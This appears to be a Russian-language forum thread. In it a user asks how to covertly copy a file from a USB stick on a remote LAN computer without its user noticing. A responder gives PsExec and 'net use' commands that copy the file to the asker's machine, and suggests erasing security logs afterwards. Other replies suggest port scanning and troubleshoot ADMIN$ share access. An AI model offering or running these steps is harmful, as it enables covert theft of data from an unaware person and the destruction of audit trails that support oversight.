Заранее благодарен всем откликнувшимся!!Постараюсь описать проблему как можно подробнее:

В чем суть:
1)Скопировать файл с USB-флешки на известном удаленном компе
2)Физического доступа к компу нет
3)Комп в локалке,пароль админа и доступ к сервакам есть
4)Пользователь на удаленном компе не должен ничего узнать!!!
5)Стандартные шары не доступны,пишет нет прав

Может кто нибудь знает решение с учетом всех пунктов?

Если есть права админа на удаленном компе.
Поскольку флешка наверняка не расшарена, то через удаленную командную строку.
Утилита psexec из пакета pstools описание и пакет (http://white55.narod.ru/pstools.html)
psexec -u admin -p admpass \\totcomp cmd.exe
В удаленной командной строке подключаете свой диск:
net use x: \\moycomp\C
И копируете файл с флешки на свой диск X:
copy d:\file x:\*.*
Отключаете свой диск
net use X: /d
и отключаетесь от чужого компа
exit

А вот заметит ли пользователь удаленного компа - это вопрос. Обычный пользователь не заметит, все действия для него невидимы, но если в этот момент он откроет например "Мой компьютер" и увидит диск X: наверно удивится. Если включен аудит безопасности, то в логах тоже останутся какие-то следы. Правда логи можно и потереть после отключения диска X и выхода (утилита psloglist.exe из pstools)

да действительно psexec весьма полезная утилита, благодарю за ссылку,однако в моем случае


psexec -u admin -p admpass \\totcomp cmd.exe

connecting to totcomp...

Couldn't access totcomp:
═х эрщфхэ ёхЄхтющ яєЄ№.

Make sure that the default admin$ share is enabled on comp79.


на компах к которым есть физический доступ все работает однако

═х эрщфхэ ёхЄхтющ яєЄ№. »

Это в WIN-кодировке - "Не найден сетевой путь". Может на момент вашего подключения он уже выключился ? Или попробуйте по IP - \\192.168.... или какой он там у него.
И есть еще один момент, - для работы psexec, на том компе должны быть доступны скрытые административные ресурсы IPC$ и ADMIN$. Обычно, если не предприняты специальные меры, они доступны.

)Стандартные шары не доступны,пишет нет прав »

3)Комп в локалке,пароль админа и доступ к сервакам есть »
Так может быть вы имели ввиду права админа на своем компе, и прав локального админа на удаленном нет?

для работы psexec, на том компе должны быть доступны скрытые административные ресурсы IPC$ и ADMIN$. »

что можно сделать если недоступны?

права есть и локальные и сетевые

Если недоступны, то pstools отпадает. Врядли что у вас получится, если нет опыта взлома, и комп защищен. Можно попробовать просканировать его, например, XSpider'ом, посмотреть, что он из себя представляет, и можно ли хотя бы к чему-нибудь прицепиться. Но сканирование может быть замечено.

Сканирование портов :
MsRDP порт 3389 / tcp Terminal Service остальные недоступны

приконектиться по rdp и оттуда скинуть себе на комп инфу..

пользователь это сразу заметит, а если и будет отсутствовать в этот момент,то я же скину его сеанс ,и когда он начнет логинится то в имени пользователя отобразится последний входивший,т.е. я.Да и логи останутся

ab57 psexec -u admin -p admpass \\totcomp cmd.exe »
Вот не могу подключится и все тут... выдает PsExec v1.94 - Execute processes remotely
Copyright (C) 2001-2008 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access mchn1:
Указанное сетевое имя более недоступно.
в чем тут хитрость? все фаерволы выключены, оба компа в полном физическом контроле, просто нужно удоленно выполнять команды, телнет отпадает т.к стоят xp Home's

Попробуйте задавать не имя компа, а его IP (например \\192.168.0.1).

Пинг по имени проходит ?

попробуй: ip\диск$

ab57
Ни по имени ни по IP не хочет. ping посмотрю, вроде пробивал...
На TechNet на этот вопрос задали встречный, "а удаленный менеджмент работает?"
Я так понимаю это подключение "Управление компьютером" к другой машине, и если нет достуапа по менеджменту, то и psTools работать не будет. Правдв в чем связь, я не понимаю.
В другой статье(весьма полезной) (http://www.microsoft.com/rus/technet/security/guidance/disasterrecovery/computer_investigation/959c31cd-216b-47fe-b821-7bb40d4156ae.mspx) , указывается на настройки брандмауэра:
Стандартная конфигурация брандмауэра Windows не позволяет использовать некоторые из средств Sysinternals, в том числе PsExec, PsFile и PsLogList. Чтобы действовать в рамках данного примера и установить, какие сведения могут быть получены удаленно с применением данных средств, необходимо открыть вкладку Исключения брандмауэра Windows и включить Общий доступ к файлам и принтерам. При этом предоставлять общий доступ к каким бы то ни было ресурсам не обязательно.

На конечных компьютерах с включенным брандмауэром Windows и отключенным общим доступом к файлам и принтерам (настройки по умолчанию), инструменты Systeminfo, Ipconfig, Arp, Netstat, Schtasks, PsFile, PsList и PsLogList необходимо запускать локально. В таком случае каждое средство следует запустить непосредственно на исследуемой системе, перенаправив вывод результатов в файл evidence2.txt, который создается в разделе «Локальный сбор доказательств» далее в этой главе.
Это я еще не проверил, но посмотрю... В принципе он у меня отключен в service.

Как настраивать удаленный менеджемт? Кто с этим сталкивался...
zai, попробуй: ip\диск$ »
Это что проверяет? доступ к share-папкам или что...

Psexec копирует себя на удаленный компьютер и устанавливает службу Psexec (psexecsvc.exe). Для этого на удаленном компьютере используется стандартный скрытый сетевой ресурс ADMIN$. Т.е. для инсталляции psexecsvc на удаленном компьютере должна работать "Служба доступа к файлам и принтерам сетей Майкрософт" и у вас должны быть права локального администратора по отношению к удаленному компьютеру. В списках служб появилась psexec ? Некоторые антивирусы определяют psexec как вирус - добавьте ее в исключения.
все фаерволы выключены, оба компа в полном физическом контроле, »
Если так, - то, похоже не инсталлировалась psexecsvc.
Может помогут логи антивирусов и системы.

ab57, антивирус отподает... а вот логи системные какие смотреть?

Для просмотра журналов - Пуск- Выполнить - eventvwr.msc
Для проверки наличия ADMIN$ на удаленном компе:
net.exe share
В результатах выполнения должны быть ресурсы IPC$ и ADMIN$
Для возможности подключения к нему с вашего компьютера:
net.exe use X: \\имя компа\ADMIN$
Сетевой диск X: - будет содержимое каталога Windows.

C:\Program Files\Far>net use x: \\mchn1\admin$
Недействительный пароль для \\mchn1\admin$.

Для подключения MCHN1\Гость к mchn1, нажмите клавишу <ВВОД>, или введите другое имя пользователя: admin
Введите пароль для mchn1:
Системная ошибка 5.

Отказано в доступе.
при этом к IPC$ подключится можно...
вобщем для PStools нужен доступ к ресурсу ADMIN$ и все будет работать... буду с правами доступа разбиратся теперь...ab57, СПАСИБО!
...и последнее - как заставить psexec в командной строке кириллицу отображать нормально, а то через FAR переводить муторно...

вобщем для PStools нужен доступ к ресурсу ADMIN$ и все будет работать... буду с правами доступа разбиратся теперь... »
Имя пользователя и пароль можно задать в ключах -u и -p
psexec -u administrator -p password \\mchn1 cmd.exe

...и последнее - как заставить psexec в командной строке кириллицу отображать нормально, а то через FAR переводить муторно... »
Создайте, например, на рабочем столе ярлык, ссылающийся на cmd.exe, затем в свойствах ярлыка
выберите "Шрифт" - "Lucida Console"
После запуска ярлыка смените кодовую страницу с досовской (866) на виндовую (1251) командой:
chcp 1251
Или проделайте то же самое для ярлыка FAR'а. Правда, мне лично FAR с Lucida Console не нравится.